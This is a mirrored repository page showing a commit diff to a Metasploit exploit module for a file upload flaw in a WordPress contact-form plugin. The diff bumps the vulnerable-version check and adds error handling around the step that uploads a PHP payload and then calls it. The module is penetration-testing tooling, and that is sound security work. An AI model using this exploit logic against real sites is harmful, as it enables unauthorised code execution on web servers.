infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #5137 (again), WordPress N-Media Website File Upload

bug/bundler_fix
Christian Mehlmauer 2015-04-16 16:24:41 +02:00
parent 7f79acb996 95310dbe4f
commit 418d8586a5
No known key found for this signature in database
GPG Key ID: BCFF4FA966BC32C7
1 changed files with 13 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
View File

@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
check_plugin_version_from_readme('website-contact-form-with-file-upload', '1.4')
check_plugin_version_from_readme('website-contact-form-with-file-upload', '1.5')
end
def exploit
@ -58,7 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => post_data
})
if res && res.code == 200 && res.body =~ /filename/
if res
if res.code == 200 && res.body =~ /filename/
begin
new_php_pagename = JSON.parse(res.body)["filename"]
rescue JSON::ParserError
@ -69,6 +70,9 @@ class Metasploit3 < Msf::Exploit::Remote
else
fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
fail_with('ERROR')
end
print_status("#{peer} - Calling payload...")
send_request_cgi(